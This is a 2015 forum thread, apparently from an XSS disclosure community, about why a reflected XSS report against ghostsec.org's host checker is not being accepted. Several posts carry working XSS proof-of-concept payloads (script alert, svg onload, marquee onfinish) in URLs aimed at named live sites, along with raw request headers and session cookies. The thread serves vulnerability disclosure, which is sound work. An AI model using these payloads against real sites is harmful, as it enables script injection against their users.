ghostsec.org submission not being approved

ret2libc
Posts:62
Joined:Tue Nov 24, 2015 11:52 am
ghostsec.org submission not being approved

Post by ret2libc » Fri Dec 11, 2015 1:07 pm

this is a weird one to replicate, when you try it via GET it will give a 'not allowed' message
http://ghostsec.org/server.php?job=host ... Fscript%3E

could you test this manually by going to ghostsec.org -> tools -> host checker -> <script>alert('XSSPOSED')</script> as input
this definitely works.

also if someone can tell me how exactly i'd go about submitting this, that would be useful. here is the output from live http headers:

Code:

m@m:~/Desktop$ cat header
http://ghostsec.org/server.php?job=hostCheck&u=%3Cscript%3Ealert(%27XSSPOSED%27)%3C%2Fscript%3E

GET /server.php?job=hostCheck&u=%3Cscript%3Ealert(%27XSSPOSED%27)%3C%2Fscript%3E HTTP/1.1
Host: ghostsec.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://ghostsec.org/
Cookie: 300gpBAK=R4178759823; 300gp=R394679152; PHPSESSID=b8b6865f79f7faf1c9ca1e129eb35fbc
Connection: keep-alive

HTTP/1.1 200 OK
Set-Cookie: 300gp=R394679152; path=/; expires=Fri, 11-Dec-2015 14:01:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Encoding: gzip
Transfer-Encoding: chunked
Date: Fri, 11 Dec 2015 12:58:38 GMT
Connection: keep-alive
X-Geo: varn35.rbx5
X-Geo-Port: 1011
X-Cacheable: Not cacheable: no-cache
----------------------------------------------------------
m@m:~/Desktop$ 

R3NW4
Posts:23
Joined:Thu Nov 26, 2015 4:45 pm

Re: ghostsec.org submission not being approved

Post by R3NW4 » Fri Dec 11, 2015 6:32 pm

i have the same problem :( with:
http://moonsy.com

x1admin
Site Admin
Posts:3101
Joined:Sun Nov 15, 2015 7:04 pm

Re: ghostsec.org submission not being approved

Post by x1admin » Sat Dec 12, 2015 6:11 am

ret2libc wrote:
could you test this manually by going to ghostsec.org -> tools -> host checker -> <script>alert('XSSPOSED')</script> as input
this definitely works.

can't reproduce

Spam404Online
Posts:296
Joined:Mon Nov 23, 2015 6:43 pm

Re: ghostsec.org submission not being approved

Post by Spam404Online » Sat Dec 12, 2015 9:25 am

Maybe submit the following URL -

Code:

http://ghostsec.org/server.php?job=hostCheck&u=%22%3E%3Csvg%2Fonload%3Dprompt(%2FXSSPOSED%2F)%3E

I would submit that and then if they got in touch it would likely result in a fix on the method to code execution you described :)

mradamdavies
Posts:29
Joined:Wed Nov 25, 2015 3:00 pm

Re: ghostsec.org submission not being approved

Post by mradamdavies » Sat Dec 12, 2015 7:16 pm

Works here:

Code:

http://microderp.com/?&1=1 <marquee loop=1 width=0 onfinish=1/prompt`/XSSPOSED/`>derp</marquee>

May need to set referer or something as clean session shows "not allowed"

ret2libc
Posts:62
Joined:Tue Nov 24, 2015 11:52 am

Re: ghostsec.org submission not being approved

Post by ret2libc » Sat Dec 12, 2015 9:53 pm

Yea that's the issue I'm getting with the 'not allowed' thing. Pretty sure that's why it isn't being accepted even tho it alerts fine for me at first

mradamdavies
Posts:29
Joined:Wed Nov 25, 2015 3:00 pm

Re: ghostsec.org submission not being approved

Post by mradamdavies » Sat Dec 12, 2015 10:29 pm

ROFL:

Code:

http://i.imgur.com/lQ1VMLU.png

ret2libc
Posts:62
Joined:Tue Nov 24, 2015 11:52 am

Re: ghostsec.org submission not being approved

Post by ret2libc » Sun Dec 13, 2015 4:19 pm

I still don't see how the admin was unable to manually reproduce this, works fine for me.
